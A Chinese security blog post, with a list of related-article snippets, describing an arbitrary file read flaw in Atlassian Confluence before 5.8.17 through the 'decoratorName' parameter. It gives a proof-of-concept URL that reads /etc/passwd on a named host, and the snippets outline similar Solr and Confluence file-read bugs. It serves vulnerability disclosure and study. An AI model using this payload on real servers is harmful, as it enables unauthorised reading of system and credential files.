Atlassian Confluence 任意文件读取

最新推荐文章于 2024-06-05 17:29:34 发布
最新推荐文章于 2024-06-05 17:29:34 发布
阅读量1.7k 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HxXhY/article/details/81029348
版权

Atlassian Confluence 任意文件读取

Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。

Atlassian Confluence 5.8.17之前版本中存在安全

该漏洞源于spaces/viewdefaultdecorator.action和admin/viewdefaultdecorator.action文件没有充分过

滤’decoratorName’参数,远程攻击者可利用该漏洞读取配置文件。

漏洞poc:

https://www.nxadmin.com/confluence/spaces/viewdefaultdecorator.action?decoratorName=file:///etc/passwd


HxXhY
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Solr任意文件读取和SSRF漏洞的自动化挖掘
weixin_40418457的博客
03-18 678
漏洞描述 Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞。 综上,存在两个漏洞:任意文件读取和SSRF,同时SSRF也可以导致任意文件读取。 漏洞详情 两个漏洞在同一个HTTP请求中触发,分别对应不同的参数,触发漏洞的url为http://x.x.x.x:8983/solr/new_core/debug/dump?stream.
docker-atlassian-confluence:打包在Docker映像中的Atlassian Confluence
02-16
Docker容器中的Atlassian Confluence 这是Atlassian Confluence与Docker的容器化安装,是我们所有人都喜欢的天堂。 该映像的目的是使安装尽可能简单,但要保留一些与Docker相关的变化。 您可以通过单击下面的相应...
Confluence 文件读取漏洞复现(CVE-2019-3394)
黑白的博客
12-06 1551
声明 好好学习,天天向上 漏洞描述 Atlassian Confluence是企业广泛使用的wiki系统 Confluence Server 和 Data Center 在页面导出功能中存在本地文件泄露漏洞:具有“添加页面”空间权限的远程攻击者,能够读取 /confluence/WEB-INF/ 目录下的任意文件。 该目录可能包含用于与其他服务集成的配置文件,可能会泄漏认证凭据,例如 LDAP 认证凭据或其他敏感信息。 影响范围 6.1.0 <= version < 6.6.16 6.7.0 &
Atlassian Confluence 高危漏洞可导致代码执行
最新发布
smellycat000的专栏
06-05 67
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士SonicWall Capture Labs 的研究团队发现了 Atlassian Confluence Data Center and Server 中的一个远程代码执行漏洞。该漏洞的编号是CVE-2024-21683,CVSS评分为8.3,可导致认证攻击者执行任意代码。要利用该漏洞,攻击者必须具有对易受攻击系统的网络访问权限,并拥有增加新的宏...
Confluence任意文件读取
打代码的小女孩
11-17 1942
影响系统 Atlassian Confluence 4.x 危害 远程攻击者利用漏洞上传恶意附件。 攻击所需条件 攻击者必须访问Atlassian Confluence。 漏洞信息 Atlassian Confluence(简称Confluence)是一个专业的wiki程序。它是一个知识管理的工具,通过它可以实现团队成员之间的协作和知识共享。 ...
Atlassian Confluence任意文件读取漏洞
weixin_30877493的博客
05-03 400
Atlassian Confluence Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。该软件可实现团队成员之间的协作和知识共享。 漏洞简介 漏洞名称:任意文件读取 漏洞类型:WEB类型漏洞 影响版本:小于或等于5.8.17版本 漏洞评级:高危 漏洞详情 漏洞请求: https://hostdomai...
Apache Solr 任意文件读取
weixin_43749601的博客
04-11 5041
简介 Solr是Apache Lucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本(如Word、PDF)的处理。Solr是高度可扩展的,并提供了分布式搜索和索引复制。Solr是最流行的企业级搜索引擎,Solr 4还增加了NoSQL支持。 Solr是用Java编写、运行在Servlet容器(如Apache Tomcat或Jetty)的一个独立的全文搜索服务器。 Solr采用了Lucene Java搜索库为核心的全文索引和搜索,并具有类似REST的HT
Atlassian Confluence 5.6.6 破解文件及汉化包,亲测可用
08-15
Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。通过它可以实现团队成员之间的协作和知识共享。 Confluence为团队提供一个协作环境。在这里,团队成员齐心协力,各擅其能,协同地编写文档...
atlassian-confluence破解文件及教程,亲测可用
01-16
atlassian-confluence破解文件已说明,6.3亲测可用。目前atlassian jira crowd confluence fisheye crucible 均安装破解成功 bamboo bitbucket还在研究
Atlassian Confluence 6.0.3安装文档
10-28
- 汉化包的使用方法通常是在安装完成后,找到Confluence的配置文件,根据提供的指南进行相应的配置修改。 - 注意,汉化操作可能需要重启Confluence服务才能生效。 #### 五、附件与资源 - **wiki相关汉化包**: ...
atlassian-confluence-7.7.2-x64.bin
09-03
大名鼎鼎的Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。
Apache Solr最新版任意文件读取0day1
08-03
0x01 正全版本任意读取 (官拒绝修复)默认安装未授权情况下,各项配置皆为默认下载 Solr 最新版本复现1. 第步2. 第步0x03 漏洞信息跟进0x04
Conference
05-03
avaya conference main book,avaya原厂资料可以提供下载
atlassian的中文介绍手册
08-14
跟踪并管理在项目开发和维护过程中出现的问题(如:缺陷,新特性,任务,改进等)是项目管理很重要的任务,但是很少 有团队能做的很好。JIRA作为一个专业的问题跟踪系统可以帮助您把缺陷管理起来,让跟踪和管理在项目中发现的问题变 得简单,而且充分利用JIRA的灵活配置和扩展性,可以将JIRA作为一个项目管理系统或者IT支持系统。 JIRA特性 1、 管理缺陷,新特性,任务,改进或者其他任何问题 2、 人性化使用的用户界面 3、 灵活的工作流定制 4、 全文搜索和强大的过滤器 5、 企业级的权限和安全控制 6、 非常灵活的邮件通知配置 7、 可以创建子任务 8、 方便的扩展及与其他系统集成:包括email、LDAP和源码控制工具等 9、 丰富的插件库 10、 项目类别和组件/模块管理 11、 可以在几乎所有硬件,操作系统和数据库平台运行
漏洞复现|(CVE-2019-3396)Confluence文件读取&远程命令执行
weixin_42282189的博客
10-22 1154
作者: 墨阳 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 1、漏洞简介 Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。Confluence Server 与 Confluence Data Center 中的 Widget Connector 存在服务端模板注入漏洞,攻击者构造特定请求可远程遍历服务器任意文件,进而可以包含恶意文件来执行代码.
Apache Solr RemoteStreaming 任意文件读取
Li-D的博客
06-07 393
漏洞描述 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache Solr是一个开源搜索服务引擎,攻击者可以在未授权的情况下构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 影响版本 Apache Solr <= 8.8.1 环境搭建 开启docker-compose环
Apache Solr任意文件读取漏洞复现
deng_menglihua的博客
03-19 2637
Apache Solr 任意文件读取漏洞 一.漏洞描述 Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 二.影响版本 Apache Solr <= 8.8.1 三.漏洞复现 1.搭环境 下载Solr https://mirrors.ukfast.co.uk/sites/ftp.apache.org/lucene/solr/8.8.1/solr-8.8.1.tgz 也使用fofa大法,搜索 app=“Solr” 访问目标 2.获取core的信息 访问
Apache Solr 任意文件读取漏洞
dahege666的博客
05-10 2125
环境搭建 下载后解压,然后把server中的JAR拷贝到example中然后CMD打开bin目录下的solr.cmd,访问 http://ip:8093(默认) Apache Solr简介 Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提
Confluence 漏洞分析排查
dayouzi的博客
08-14 244
Confluence Server 和 Data Center 中的 Widget Connector 中存在服Confluence是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。1、其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。
Atlassian Confluence mysql报错
05-25
一般来说,Atlassian Confluence mysql报错可能有很多种原因,以下是一些常见的解决方法: 1. 检查数据库连接信息是否正确,并确认数据库是否正常运行。 2. 确认数据库版本与Confluence版本是否匹配。 3. 检查...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值